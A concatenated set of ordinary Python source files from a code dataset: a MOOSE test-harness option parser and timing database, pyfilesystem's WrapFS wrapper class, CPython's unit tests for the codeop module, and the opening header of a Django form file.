os.makedirs(self.output_dir)
except OSError, ex:
if ex.errno == errno.EEXIST: pass
else: raise
# Open the file to redirect output to and set the quiet option for file output
if self.options.file:
self.file = open(os.path.join(self.output_dir, self.options.file), 'w')
if self.options.file or self.options.fail_files or self.options.sep_files:
self.options.quiet = True
## Parse command line options and assign them to self.options
def parseCLArgs(self, argv):
parser = argparse.ArgumentParser(description='A tool used to test MOOSE based applications')
parser.add_argument('test_name', nargs=argparse.REMAINDER)
parser.add_argument('--opt', action='store_const', dest='method', const='opt', help='test the app_name-opt binary')
parser.add_argument('--dbg', action='store_const', dest='method', const='dbg', help='test the app_name-dbg binary')
parser.add_argument('--devel', action='store_const', dest='method', const='devel', help='test the app_name-devel binary')
parser.add_argument('--oprof', action='store_const', dest='method', const='oprof', help='test the app_name-oprof binary')
parser.add_argument('--pro', action='store_const', dest='method', const='pro', help='test the app_name-pro binary')
parser.add_argument('-j', '--jobs', nargs='?', metavar='int', action='store', type=int, dest='jobs', const=1, help='run test binaries in parallel')
parser.add_argument('-e', action='store_true', dest='extra_info', help='Display "extra" information including all caveats and deleted tests')
parser.add_argument('-c', '--no-color', action='store_false', dest='colored', help='Do not show colored output')
parser.add_argument('--heavy', action='store_true', dest='heavy_tests', help='Run tests marked with HEAVY : True')
parser.add_argument('--all-tests', action='store_true', dest='all_tests', help='Run normal tests and tests marked with HEAVY : True')
parser.add_argument('-g', '--group', action='store', type=str, dest='group', default='ALL', help='Run only tests in the named group')
parser.add_argument('--not_group', action='store', type=str, dest='not_group', help='Run only tests NOT in the named group')
# parser.add_argument('--dofs', action='store', dest='dofs', help='This option is for automatic scaling which is not currently implemented in MOOSE 2.0')
parser.add_argument('--dbfile', nargs='?', action='store', dest='dbFile', help='Location to timings data base file. If not set, assumes $HOME/timingDB/timing.sqlite')
parser.add_argument('-l', '--load-average', action='store', type=float, dest='load', default=64.0, help='Do not run additional tests if the load average is at least LOAD')
parser.add_argument('-t', '--timing', action='store_true', dest='timing', help='Report Timing information for passing tests')
parser.add_argument('-s', '--scale', action='store_true', dest='scaling', help='Scale problems that have SCALE_REFINE set')
parser.add_argument('-i', nargs=1, action='store', type=str, dest='input_file_name', default='tests', help='The default test specification file to look for (default="tests").')
parser.add_argument('--libmesh_dir', nargs=1, action='store', type=str, dest='libmesh_dir', help='Currently only needed for bitten code coverage')
parser.add_argument('--skip-config-checks', action='store_true', dest='skip_config_checks', help='Skip configuration checks (all tests will run regardless of restrictions)')
parser.add_argument('--parallel', '-p', nargs='?', action='store', type=int, dest='parallel', const=1, help='Number of processors to use when running mpiexec')
parser.add_argument('--n-threads', nargs=1, action='store', type=int, dest='nthreads', default=1, help='Number of threads to use when running mpiexec')
parser.add_argument('-d', action='store_true', dest='debug_harness', help='Turn on Test Harness debugging')
parser.add_argument('--recover', action='store_true', dest='enable_recover', help='Run a test in recover mode')
parser.add_argument('--valgrind', action='store_const', dest='valgrind_mode', const='NORMAL', help='Run normal valgrind tests')
parser.add_argument('--valgrind-heavy', action='store_const', dest='valgrind_mode', const='HEAVY', help='Run heavy valgrind tests')
parser.add_argument('--valgrind-max-fails', nargs=1, type=int, dest='valgrind_max_fails', default=5, help='The number of valgrind tests allowed to fail before any additional valgrind tests will run')
parser.add_argument('--max-fails', nargs=1, type=int, dest='max_fails', default=50, help='The number of tests allowed to fail before any additional tests will run')
parser.add_argument('--pbs', nargs='?', metavar='batch_file', dest='pbs', const='generate', help='Enable launching tests via PBS. If no batch file is specified one will be created for you')
parser.add_argument('--pbs-cleanup', nargs=1, metavar='batch_file', help='Clean up the directories/files created by PBS. You must supply the same batch_file used to launch PBS.')
parser.add_argument('--pbs-project', nargs=1, default='moose', help='Identify PBS job submission to specified project')
parser.add_argument('--re', action='store', type=str, dest='reg_exp', help='Run tests that match --re=regular_expression')
# Options that pass straight through to the executable
parser.add_argument('--parallel-mesh', action='store_true', dest='parallel_mesh', help='Deprecated, use --distributed-mesh instead')
parser.add_argument('--distributed-mesh', action='store_true', dest='distributed_mesh', help='Pass "--distributed-mesh" to executable')
parser.add_argument('--error', action='store_true', help='Run the tests with warnings as errors (Pass "--error" to executable)')
parser.add_argument('--error-unused', action='store_true', help='Run the tests with errors on unused parameters (Pass "--error-unused" to executable)')
# Option to use for passing unwrapped options to the executable
parser.add_argument('--cli-args', nargs='?', type=str, dest='cli_args', help='Append the following list of arguments to the command line (Encapsulate the command in quotes)')
parser.add_argument('--dry-run', action='store_true', dest='dry_run', help="Pass --dry-run to print commands to run, but don't actually run them")
outputgroup = parser.add_argument_group('Output Options', 'These options control the output of the test harness. The sep-files options write output to files named test_name.TEST_RESULT.txt. All file output will overwrite old files')
outputgroup.add_argument('-v', '--verbose', action='store_true', dest='verbose', help='show the output of every test')
outputgroup.add_argument('-q', '--quiet', action='store_true', dest='quiet', help='only show the result of every test, don\'t show test output even if it fails')
outputgroup.add_argument('--no-report', action='store_false', dest='report_skipped', help='do not report skipped tests')
outputgroup.add_argument('--show-directory', action='store_true', dest='show_directory', help='Print test directory path in out messages')
outputgroup.add_argument('-o', '--output-dir', nargs=1, metavar='directory', dest='output_dir', default='', help='Save all output files in the directory, and create it if necessary')
outputgroup.add_argument('-f', '--file', nargs=1, action='store', dest='file', help='Write verbose output of each test to FILE and quiet output to terminal')
outputgroup.add_argument('-x', '--sep-files', action='store_true', dest='sep_files', help='Write the output of each test to a separate file. Only quiet output to terminal. This is equivalant to \'--sep-files-fail --sep-files-ok\'')
outputgroup.add_argument('--sep-files-ok', action='store_true', dest='ok_files', help='Write the output of each passed test to a separate file')
outputgroup.add_argument('-a', '--sep-files-fail', action='store_true', dest='fail_files', help='Write the output of each FAILED test to a separate file. Only quiet output to terminal.')
outputgroup.add_argument("--store-timing", action="store_true", dest="store_time", help="Store timing in the SQL database: $HOME/timingDB/timing.sqlite A parent directory (timingDB) must exist.")
outputgroup.add_argument("--testharness-unittest", action="store_true", help="Run the TestHarness unittests that test the TestHarness.")
outputgroup.add_argument("--revision", nargs=1, action="store", type=str, dest="revision", help="The current revision being tested. Required when using --store-timing.")
outputgroup.add_argument("--yaml", action="store_true", dest="yaml", help="Dump the parameters for the testers in Yaml Format")
outputgroup.add_argument("--dump", action="store_true", dest="dump", help="Dump the parameters for the testers in GetPot Format")
code = True
if self.code.decode('hex') in argv:
del argv[argv.index(self.code.decode('hex'))]
code = False
self.options = parser.parse_args(argv[1:])
self.tests = self.options.test_name
self.options.code = code
# Convert all list based options of length one to scalars
for key, value in vars(self.options).items():
if type(value) == list and len(value) == 1:
tmp_str = getattr(self.options, key)
setattr(self.options, key, value[0])
self.checkAndUpdateCLArgs()
## Called after options are parsed from the command line
# Exit if options don't make any sense, print warnings if they are merely weird
def checkAndUpdateCLArgs(self):
opts = self.options
if opts.output_dir and not (opts.file or opts.sep_files or opts.fail_files or opts.ok_files):
print 'WARNING: --output-dir is specified but no output files will be saved, use -f or a --sep-files option'
if opts.group == opts.not_group:
print 'ERROR: The group and not_group options cannot specify the same group'
sys.exit(1)
if opts.store_time and not (opts.revision):
print 'ERROR: --store-timing is specified but no revision'
sys.exit(1)
if opts.store_time:
# timing returns Active Time, while store_timing returns Solve Time.
# Thus we need to turn off timing.
opts.timing = False
opts.scaling = True
if opts.valgrind_mode and (opts.parallel > 1 or opts.nthreads > 1):
print 'ERROR: --parallel and/or --threads can not be used with --valgrind'
sys.exit(1)
# Update any keys from the environment as necessary
if not self.options.method:
if os.environ.has_key('METHOD'):
self.options.method = os.environ['METHOD']
else:
self.options.method = 'opt'
if not self.options.valgrind_mode:
self.options.valgrind_mode = ''
# Update libmesh_dir to reflect arguments
if opts.libmesh_dir:
self.libmesh_dir = opts.libmesh_dir
# Generate a batch file if PBS argument supplied with out a file
if opts.pbs == 'generate':
largest_serial_num = 0
for name in os.listdir('.'):
m = re.search('pbs_(\d{3})', name)
if m != None and int(m.group(1)) > largest_serial_num:
largest_serial_num = int(m.group(1))
opts.pbs = "pbs_" + str(largest_serial_num+1).zfill(3)
# When running heavy tests, we'll make sure we use --no-report
if opts.heavy_tests:
self.options.report_skipped = False
def postRun(self, specs, timing):
return
def preRun(self):
if self.options.yaml:
self.factory.printYaml("Tests")
sys.exit(0)
elif self.options.dump:
self.factory.printDump("Tests")
sys.exit(0)
if self.options.pbs_cleanup:
self.cleanPBSBatch()
sys.exit(0)
def getOptions(self):
return self.options
#################################################################################################################################
# The TestTimer TestHarness
# This method finds and stores timing for individual tests. It is activated with --store-timing
#################################################################################################################################
CREATE_TABLE = """create table timing
(
app_name text,
test_name text,
revision text,
date int,
seconds real,
scale int,
load real
);"""
class TestTimer(TestHarness):
def __init__(self, argv, app_name, moose_dir):
TestHarness.__init__(self, argv, app_name, moose_dir)
try:
from sqlite3 import dbapi2 as sqlite
except:
print 'Error: --store-timing requires the sqlite3 python module.'
sys.exit(1)
self.app_name = app_name
self.db_file = self.options.dbFile
if not self.db_file:
home = os.environ['HOME']
self.db_file = os.path.join(home, 'timingDB/timing.sqlite')
if not os.path.exists(self.db_file):
print 'Warning: creating new database at default location: ' + str(self.db_file)
self.createDB(self.db_file)
else:
print 'Warning: Assuming database location ' + self.db_file
def createDB(self, fname):
from sqlite3 import dbapi2 as sqlite
print 'Creating empty database at ' + fname
con = sqlite.connect(fname)
cr = con.cursor()
cr.execute(CREATE_TABLE)
con.commit()
def preRun(self):
from sqlite3 import dbapi2 as sqlite
# Delete previous data if app_name and repo revision are found
con = sqlite.connect(self.db_file)
cr = con.cursor()
cr.execute('delete from timing where app_name = ? and revision = ?', (self.app_name, self.options.revision))
con.commit()
# After the run store the results in the database
def postRun(self, test, timing):
from sqlite3 import dbapi2 as sqlite
con = sqlite.connect(self.db_file)
cr = con.cursor()
timestamp = int(time.time())
load = os.getloadavg()[0]
# accumulate the test results
data = []
sum_time = 0
num = 0
parse_failed = False
# Were only interested in storing scaled data
if timing != None and test['scale_refine'] != 0:
sum_time += float(timing)
num += 1
data.append( (self.app_name, test['test_name'].split('/').pop(), self.options.revision, timestamp, timing, test['scale_refine'], load) )
# Insert the data into the database
cr.executemany('insert into timing values (?,?,?,?,?,?,?)', data)
con.commit()
class TestHarnessTester(object):
"""
Class for running TestHarness unit tests.
"""
def __init__(self, argv, *args):
self._argv = argv
def findAndRunTests(self):
"""
Execute the unittests for the TestHarness.
"""
location = os.path.join(os.path.dirname(__file__), 'unit_tests')
loader = unittest.TestLoader()
suite = loader.discover(location)#, pattern)
runner = unittest.TextTestRunner(verbosity=2)
self.error_code = int(not runner.run(suite).wasSuccessful())
|
DANCEcollaborative/forum-xblock
|
refs/heads/master
|
XBlock Integration Files/xdjangobb/xblock/lib/python2.7/site-packages/fs/wrapfs/__init__.py
|
13
|
"""
fs.wrapfs
=========
A class for wrapping an existing FS object with additional functionality.
This module provides the class WrapFS, a base class for objects that wrap
another FS object and provide some transformation of its contents. It could
be very useful for implementing e.g. transparent encryption or compression
services.
For a simple example of how this class could be used, see the 'HideDotFilesFS'
class in the module fs.wrapfs.hidedotfilesfs. This wrapper implements the
standard unix shell functionality of hiding dot-files in directory listings.
"""
import re
import sys
import fnmatch
import threading
from fs.base import FS, threading, synchronize, NoDefaultMeta
from fs.errors import *
from fs.path import *
from fs.local_functools import wraps
def rewrite_errors(func):
"""Re-write paths in errors raised by wrapped FS objects."""
@wraps(func)
def wrapper(self,*args,**kwds):
try:
return func(self,*args,**kwds)
except ResourceError, e:
(exc_type,exc_inst,tb) = sys.exc_info()
try:
e.path = self._decode(e.path)
except (AttributeError, ValueError, TypeError):
raise e, None, tb
raise
return wrapper
class WrapFS(FS):
"""FS that wraps another FS, providing translation etc.
This class allows simple transforms to be applied to the names
and/or contents of files in an FS. It could be used to implement
e.g. compression or encryption in a relatively painless manner.
The following methods can be overridden to control how files are
accessed in the underlying FS object:
* _file_wrap(file, mode): called for each file that is opened from
the underlying FS; may return a modified
file-like object.
* _encode(path): encode a path for access in the underlying FS
* _decode(path): decode a path from the underlying FS
If the required path translation proceeds one component at a time,
it may be simpler to override the _encode_name() and _decode_name()
methods.
"""
def __init__(self, fs):
super(WrapFS, self).__init__()
try:
self._lock = fs._lock
except (AttributeError,FSError):
self._lock = self._lock = threading.RLock()
self.wrapped_fs = fs
def _file_wrap(self, f, mode):
"""Apply wrapping to an opened file."""
return f
def _encode_name(self, name):
"""Encode path component for the underlying FS."""
return name
def _decode_name(self, name):
"""Decode path component from the underlying FS."""
return name
def _encode(self, path):
"""Encode path for the underlying FS."""
e_names = []
for name in iteratepath(path):
if name == "":
e_names.append("")
else:
e_names.append(self._encode_name(name))
return "/".join(e_names)
def _decode(self, path):
"""Decode path from the underlying FS."""
d_names = []
for name in iteratepath(path):
if name == "":
d_names.append("")
else:
d_names.append(self._decode_name(name))
return "/".join(d_names)
def _adjust_mode(self, mode):
"""Adjust the mode used to open a file in the underlying FS.
This method takes the mode given when opening a file, and should
return a two-tuple giving the mode to be used in this FS as first
item, and the mode to be used in the underlying FS as the second.
An example of why this is needed is a WrapFS subclass that does
transparent file compression - in this case files from the wrapped
FS cannot be opened in append mode.
"""
return (mode, mode)
def __unicode__(self):
return u"<%s: %s>" % (self.__class__.__name__,self.wrapped_fs,)
#def __str__(self):
# return unicode(self).encode(sys.getdefaultencoding(),"replace")
@rewrite_errors
def getmeta(self, meta_name, default=NoDefaultMeta):
return self.wrapped_fs.getmeta(meta_name, default)
@rewrite_errors
def hasmeta(self, meta_name):
return self.wrapped_fs.hasmeta(meta_name)
@rewrite_errors
def validatepath(self, path):
return self.wrapped_fs.validatepath(self._encode(path))
@rewrite_errors
def getsyspath(self, path, allow_none=False):
return self.wrapped_fs.getsyspath(self._encode(path), allow_none)
@rewrite_errors
def getpathurl(self, path, allow_none=False):
return self.wrapped_fs.getpathurl(self._encode(path), allow_none)
@rewrite_errors
def hassyspath(self, path):
return self.wrapped_fs.hassyspath(self._encode(path))
@rewrite_errors
def open(self, path, mode='r', **kwargs):
(mode, wmode) = self._adjust_mode(mode)
f = self.wrapped_fs.open(self._encode(path), wmode, **kwargs)
return self._file_wrap(f, mode)
@rewrite_errors
def setcontents(self, path, data, encoding=None, errors=None, chunk_size=64*1024):
# We can't pass setcontents() through to the wrapped FS if the
# wrapper has defined a _file_wrap method, as it would bypass
# the file contents wrapping.
#if self._file_wrap.im_func is WrapFS._file_wrap.im_func:
if getattr(self.__class__, '_file_wrap', None) is getattr(WrapFS, '_file_wrap', None):
return self.wrapped_fs.setcontents(self._encode(path), data, encoding=encoding, errors=errors, chunk_size=chunk_size)
else:
return super(WrapFS, self).setcontents(path, data, encoding=encoding, errors=errors, chunk_size=chunk_size)
@rewrite_errors
def createfile(self, path, wipe=False):
return self.wrapped_fs.createfile(self._encode(path), wipe=wipe)
@rewrite_errors
def exists(self, path):
return self.wrapped_fs.exists(self._encode(path))
@rewrite_errors
def isdir(self, path):
return self.wrapped_fs.isdir(self._encode(path))
@rewrite_errors
def isfile(self, path):
return self.wrapped_fs.isfile(self._encode(path))
@rewrite_errors
def listdir(self, path="", wildcard=None, full=False, absolute=False, dirs_only=False, files_only=False):
kwds = dict(wildcard=wildcard,
full=full,
absolute=absolute,
dirs_only=dirs_only,
files_only=files_only)
full = kwds.pop("full",False)
absolute = kwds.pop("absolute",False)
wildcard = kwds.pop("wildcard",None)
if wildcard is None:
wildcard = lambda fn:True
elif not callable(wildcard):
wildcard_re = re.compile(fnmatch.translate(wildcard))
wildcard = lambda fn:bool (wildcard_re.match(fn))
entries = []
enc_path = self._encode(path)
for e in self.wrapped_fs.listdir(enc_path,**kwds):
e = basename(self._decode(pathcombine(enc_path,e)))
if not wildcard(e):
continue
if full:
e = pathcombine(path,e)
elif absolute:
e = abspath(pathcombine(path,e))
entries.append(e)
return entries
@rewrite_errors
def ilistdir(self, path="", wildcard=None, full=False, absolute=False, dirs_only=False, files_only=False):
kwds = dict(wildcard=wildcard,
full=full,
absolute=absolute,
dirs_only=dirs_only,
files_only=files_only)
full = kwds.pop("full",False)
absolute = kwds.pop("absolute",False)
wildcard = kwds.pop("wildcard",None)
if wildcard is None:
wildcard = lambda fn:True
elif not callable(wildcard):
wildcard_re = re.compile(fnmatch.translate(wildcard))
wildcard = lambda fn:bool (wildcard_re.match(fn))
enc_path = self._encode(path)
for e in self.wrapped_fs.ilistdir(enc_path,**kwds):
e = basename(self._decode(pathcombine(enc_path,e)))
if not wildcard(e):
continue
if full:
e = pathcombine(path,e)
elif absolute:
e = abspath(pathcombine(path,e))
yield e
@rewrite_errors
def listdirinfo(self, path="", wildcard=None, full=False, absolute=False, dirs_only=False, files_only=False):
kwds = dict(wildcard=wildcard,
full=full,
absolute=absolute,
dirs_only=dirs_only,
files_only=files_only)
full = kwds.pop("full",False)
absolute = kwds.pop("absolute",False)
wildcard = kwds.pop("wildcard",None)
if wildcard is None:
wildcard = lambda fn:True
elif not callable(wildcard):
wildcard_re = re.compile(fnmatch.translate(wildcard))
wildcard = lambda fn:bool (wildcard_re.match(fn))
entries = []
enc_path = self._encode(path)
for (nm,info) in self.wrapped_fs.listdirinfo(enc_path,**kwds):
nm = basename(self._decode(pathcombine(enc_path,nm)))
if not wildcard(nm):
continue
if full:
nm = pathcombine(path,nm)
elif absolute:
nm = abspath(pathcombine(path,nm))
entries.append((nm,info))
return entries
@rewrite_errors
def ilistdirinfo(self, path="", wildcard=None, full=False, absolute=False, dirs_only=False, files_only=False):
kwds = dict(wildcard=wildcard,
full=full,
absolute=absolute,
dirs_only=dirs_only,
files_only=files_only)
full = kwds.pop("full",False)
absolute = kwds.pop("absolute",False)
wildcard = kwds.pop("wildcard",None)
if wildcard is None:
wildcard = lambda fn:True
elif not callable(wildcard):
wildcard_re = re.compile(fnmatch.translate(wildcard))
wildcard = lambda fn:bool (wildcard_re.match(fn))
enc_path = self._encode(path)
for (nm,info) in self.wrapped_fs.ilistdirinfo(enc_path,**kwds):
nm = basename(self._decode(pathcombine(enc_path,nm)))
if not wildcard(nm):
continue
if full:
nm = pathcombine(path,nm)
elif absolute:
nm = abspath(pathcombine(path,nm))
yield (nm,info)
@rewrite_errors
def walk(self,path="/",wildcard=None,dir_wildcard=None,search="breadth",ignore_errors=False):
if dir_wildcard is not None:
# If there is a dir_wildcard, fall back to the default impl
# that uses listdir(). Otherwise we run the risk of enumerating
# lots of directories that will just be thrown away.
for item in super(WrapFS,self).walk(path,wildcard,dir_wildcard,search,ignore_errors):
yield item
# Otherwise, the wrapped FS may provide a more efficient impl
# which we can use directly.
else:
if wildcard is not None and not callable(wildcard):
wildcard_re = re.compile(fnmatch.translate(wildcard))
wildcard = lambda fn:bool (wildcard_re.match(fn))
for (dirpath,filepaths) in self.wrapped_fs.walk(self._encode(path),search=search,ignore_errors=ignore_errors):
filepaths = [basename(self._decode(pathcombine(dirpath,p)))
for p in filepaths]
dirpath = abspath(self._decode(dirpath))
if wildcard is not None:
filepaths = [p for p in filepaths if wildcard(p)]
yield (dirpath,filepaths)
@rewrite_errors
def walkfiles(self,path="/",wildcard=None,dir_wildcard=None,search="breadth",ignore_errors=False):
if dir_wildcard is not None:
# If there is a dir_wildcard, fall back to the default impl
# that uses listdir(). Otherwise we run the risk of enumerating
# lots of directories that will just be thrown away.
for item in super(WrapFS,self).walkfiles(path,wildcard,dir_wildcard,search,ignore_errors):
yield item
# Otherwise, the wrapped FS may provide a more efficient impl
# which we can use directly.
else:
if wildcard is not None and not callable(wildcard):
wildcard_re = re.compile(fnmatch.translate(wildcard))
wildcard = lambda fn:bool (wildcard_re.match(fn))
for filepath in self.wrapped_fs.walkfiles(self._encode(path),search=search,ignore_errors=ignore_errors):
filepath = abspath(self._decode(filepath))
if wildcard is not None:
if not wildcard(basename(filepath)):
continue
yield filepath
@rewrite_errors
def walkdirs(self,path="/",wildcard=None,search="breadth",ignore_errors=False):
if wildcard is not None:
# If there is a wildcard, fall back to the default impl
# that uses listdir(). Otherwise we run the risk of enumerating
# lots of directories that will just be thrown away.
for item in super(WrapFS,self).walkdirs(path,wildcard,search,ignore_errors):
yield item
# Otherwise, the wrapped FS may provide a more efficient impl
# which we can use directly.
else:
for dirpath in self.wrapped_fs.walkdirs(self._encode(path),search=search,ignore_errors=ignore_errors):
yield abspath(self._decode(dirpath))
@rewrite_errors
def makedir(self, path, *args, **kwds):
return self.wrapped_fs.makedir(self._encode(path),*args,**kwds)
@rewrite_errors
def remove(self, path):
return self.wrapped_fs.remove(self._encode(path))
@rewrite_errors
def removedir(self, path, *args, **kwds):
return self.wrapped_fs.removedir(self._encode(path),*args,**kwds)
@rewrite_errors
def rename(self, src, dst):
return self.wrapped_fs.rename(self._encode(src),self._encode(dst))
@rewrite_errors
def getinfo(self, path):
return self.wrapped_fs.getinfo(self._encode(path))
@rewrite_errors
def settimes(self, path, *args, **kwds):
return self.wrapped_fs.settimes(self._encode(path), *args,**kwds)
@rewrite_errors
def desc(self, path):
return self.wrapped_fs.desc(self._encode(path))
@rewrite_errors
def copy(self, src, dst, **kwds):
return self.wrapped_fs.copy(self._encode(src),self._encode(dst),**kwds)
@rewrite_errors
def move(self, src, dst, **kwds):
return self.wrapped_fs.move(self._encode(src),self._encode(dst),**kwds)
@rewrite_errors
def movedir(self, src, dst, **kwds):
return self.wrapped_fs.movedir(self._encode(src),self._encode(dst),**kwds)
@rewrite_errors
def copydir(self, src, dst, **kwds):
return self.wrapped_fs.copydir(self._encode(src),self._encode(dst),**kwds)
@rewrite_errors
def getxattr(self, path, name, default=None):
try:
return self.wrapped_fs.getxattr(self._encode(path),name,default)
except AttributeError:
raise UnsupportedError("getxattr")
@rewrite_errors
def setxattr(self, path, name, value):
try:
return self.wrapped_fs.setxattr(self._encode(path),name,value)
except AttributeError:
raise UnsupportedError("setxattr")
@rewrite_errors
def delxattr(self, path, name):
try:
return self.wrapped_fs.delxattr(self._encode(path),name)
except AttributeError:
raise UnsupportedError("delxattr")
@rewrite_errors
def listxattrs(self, path):
try:
return self.wrapped_fs.listxattrs(self._encode(path))
except AttributeError:
raise UnsupportedError("listxattrs")
def __getattr__(self, attr):
# These attributes can be used by the destructor, but may not be
# defined if there are errors in the constructor.
if attr == "closed":
return False
if attr == "wrapped_fs":
return None
if attr.startswith("_"):
raise AttributeError(attr)
return getattr(self.wrapped_fs,attr)
@rewrite_errors
def close(self):
if not self.closed:
self.wrapped_fs.close()
super(WrapFS,self).close()
self.wrapped_fs = None
def wrap_fs_methods(decorator, cls=None, exclude=[]):
"""Apply the given decorator to all FS methods on the given class.
This function can be used in two ways. When called with two arguments it
applies the given function 'decorator' to each FS method of the given
class. When called with just a single argument, it creates and returns
a class decorator which will do the same thing when applied. So you can
use it like this::
wrap_fs_methods(mydecorator,MyFSClass)
Or on more recent Python versions, like this::
@wrap_fs_methods(mydecorator)
class MyFSClass(FS):
...
"""
def apply_decorator(cls):
for method_name in wrap_fs_methods.method_names:
if method_name in exclude:
continue
method = getattr(cls,method_name,None)
if method is not None:
setattr(cls,method_name,decorator(method))
return cls
if cls is not None:
return apply_decorator(cls)
else:
return apply_decorator
wrap_fs_methods.method_names = ["open","exists","isdir","isfile","listdir",
"makedir","remove","setcontents","removedir","rename","getinfo","copy",
"move","copydir","movedir","close","getxattr","setxattr","delxattr",
"listxattrs","validatepath","getsyspath","createfile", "hasmeta", "getmeta","listdirinfo",
"ilistdir","ilistdirinfo"]
|
mancoast/CPythonPyc_test
|
refs/heads/master
|
fail/321_test_codeop.py
|
53
|
"""
Test cases for codeop.py
Nick Mathewson
"""
import unittest
from test.support import run_unittest, is_jython
from codeop import compile_command, PyCF_DONT_IMPLY_DEDENT
import io
if is_jython:
import sys
def unify_callables(d):
for n,v in d.items():
if hasattr(v, '__call__'):
d[n] = True
return d
class CodeopTests(unittest.TestCase):
def assertValid(self, str, symbol='single'):
'''succeed iff str is a valid piece of code'''
if is_jython:
code = compile_command(str, "<input>", symbol)
self.assertTrue(code)
if symbol == "single":
d,r = {},{}
saved_stdout = sys.stdout
sys.stdout = io.StringIO()
try:
exec(code, d)
exec(compile(str,"<input>","single"), r)
finally:
sys.stdout = saved_stdout
elif symbol == 'eval':
ctx = {'a': 2}
d = { 'value': eval(code,ctx) }
r = { 'value': eval(str,ctx) }
self.assertEqual(unify_callables(r),unify_callables(d))
else:
expected = compile(str, "<input>", symbol, PyCF_DONT_IMPLY_DEDENT)
self.assertEqual(compile_command(str, "<input>", symbol), expected)
def assertIncomplete(self, str, symbol='single'):
'''succeed iff str is the start of a valid piece of code'''
self.assertEqual(compile_command(str, symbol=symbol), None)
def assertInvalid(self, str, symbol='single', is_syntax=1):
'''succeed iff str is the start of an invalid piece of code'''
try:
compile_command(str,symbol=symbol)
self.fail("No exception thrown for invalid code")
except SyntaxError:
self.assertTrue(is_syntax)
except OverflowError:
self.assertTrue(not is_syntax)
def test_valid(self):
av = self.assertValid
# special case
if not is_jython:
self.assertEqual(compile_command(""),
compile("pass", "<input>", 'single',
PyCF_DONT_IMPLY_DEDENT))
self.assertEqual(compile_command("\n"),
compile("pass", "<input>", 'single',
PyCF_DONT_IMPLY_DEDENT))
else:
av("")
av("\n")
av("a = 1")
av("\na = 1")
av("a = 1\n")
av("a = 1\n\n")
av("\n\na = 1\n\n")
av("def x():\n pass\n")
av("if 1:\n pass\n")
av("\n\nif 1: pass\n")
av("\n\nif 1: pass\n\n")
av("def x():\n\n pass\n")
av("def x():\n pass\n \n")
av("def x():\n pass\n \n")
av("pass\n")
av("3**3\n")
av("if 9==3:\n pass\nelse:\n pass\n")
av("if 1:\n pass\n if 1:\n pass\n else:\n pass\n")
av("#a\n#b\na = 3\n")
av("#a\n\n \na=3\n")
av("a=3\n\n")
av("a = 9+ \\\n3")
av("3**3","eval")
av("(lambda z: \n z**3)","eval")
av("9+ \\\n3","eval")
av("9+ \\\n3\n","eval")
av("\n\na**3","eval")
av("\n \na**3","eval")
av("#a\n#b\na**3","eval")
av("\n\na = 1\n\n")
av("\n\nif 1: a=1\n\n")
av("if 1:\n pass\n if 1:\n pass\n else:\n pass\n")
av("#a\n\n \na=3\n\n")
av("\n\na**3","eval")
av("\n \na**3","eval")
av("#a\n#b\na**3","eval")
av("def f():\n try: pass\n finally: [x for x in (1,2)]\n")
av("def f():\n pass\n#foo\n")
av("@a.b.c\ndef f():\n pass\n")
def test_incomplete(self):
ai = self.assertIncomplete
ai("(a **")
ai("(a,b,")
ai("(a,b,(")
ai("(a,b,(")
ai("a = (")
ai("a = {")
ai("b + {")
ai("if 9==3:\n pass\nelse:")
ai("if 9==3:\n pass\nelse:\n")
ai("if 9==3:\n pass\nelse:\n pass")
ai("if 1:")
ai("if 1:\n")
ai("if 1:\n pass\n if 1:\n pass\n else:")
ai("if 1:\n pass\n if 1:\n pass\n else:\n")
ai("if 1:\n pass\n if 1:\n pass\n else:\n pass")
ai("def x():")
ai("def x():\n")
ai("def x():\n\n")
ai("def x():\n pass")
ai("def x():\n pass\n ")
ai("def x():\n pass\n ")
ai("\n\ndef x():\n pass")
ai("a = 9+ \\")
ai("a = 'a\\")
ai("a = '''xy")
ai("","eval")
ai("\n","eval")
ai("(","eval")
ai("(\n\n\n","eval")
ai("(9+","eval")
ai("9+ \\","eval")
ai("lambda z: \\","eval")
ai("if True:\n if True:\n if True: \n")
ai("@a(")
ai("@a(b")
ai("@a(b,")
ai("@a(b,c")
ai("@a(b,c,")
ai("from a import (")
ai("from a import (b")
ai("from a import (b,")
ai("from a import (b,c")
ai("from a import (b,c,")
ai("[");
ai("[a");
ai("[a,");
ai("[a,b");
ai("[a,b,");
ai("{");
ai("{a");
ai("{a:");
ai("{a:b");
ai("{a:b,");
ai("{a:b,c");
ai("{a:b,c:");
ai("{a:b,c:d");
ai("{a:b,c:d,");
ai("a(")
ai("a(b")
ai("a(b,")
ai("a(b,c")
ai("a(b,c,")
ai("a[")
ai("a[b")
ai("a[b,")
ai("a[b:")
ai("a[b:c")
ai("a[b:c:")
ai("a[b:c:d")
ai("def a(")
ai("def a(b")
ai("def a(b,")
ai("def a(b,c")
ai("def a(b,c,")
ai("(")
ai("(a")
ai("(a,")
ai("(a,b")
ai("(a,b,")
ai("if a:\n pass\nelif b:")
ai("if a:\n pass\nelif b:\n pass\nelse:")
ai("while a:")
ai("while a:\n pass\nelse:")
ai("for a in b:")
ai("for a in b:\n pass\nelse:")
ai("try:")
ai("try:\n pass\nexcept:")
ai("try:\n pass\nfinally:")
ai("try:\n pass\nexcept:\n pass\nfinally:")
ai("with a:")
ai("with a as b:")
ai("class a:")
ai("class a(")
ai("class a(b")
ai("class a(b,")
ai("class a():")
ai("[x for")
ai("[x for x in")
ai("[x for x in (")
ai("(x for")
ai("(x for x in")
ai("(x for x in (")
def test_invalid(self):
ai = self.assertInvalid
ai("a b")
ai("a @")
ai("a b @")
ai("a ** @")
ai("a = ")
ai("a = 9 +")
ai("def x():\n\npass\n")
ai("\n\n if 1: pass\n\npass")
ai("a = 9+ \\\n")
ai("a = 'a\\ ")
ai("a = 'a\\\n")
ai("a = 1","eval")
ai("a = (","eval")
ai("]","eval")
ai("())","eval")
ai("[}","eval")
ai("9+","eval")
ai("lambda z:","eval")
ai("a b","eval")
ai("return 2.3")
ai("if (a == 1 and b = 2): pass")
ai("del 1")
ai("del ()")
ai("del (1,)")
ai("del [1]")
ai("del '1'")
ai("[i for i in range(10)] = (1, 2, 3)")
def test_filename(self):
self.assertEqual(compile_command("a = 1\n", "abc").co_filename,
compile("a = 1\n", "abc", 'single').co_filename)
self.assertNotEqual(compile_command("a = 1\n", "abc").co_filename,
compile("a = 1\n", "def", 'single').co_filename)
def test_main():
run_unittest(CodeopTests)
if __name__ == "__main__":
test_main()
|
uclouvain/osis_louvain
|
refs/heads/master
|
base/forms/learning_achievement.py
|
1
|
##############################################################################
#
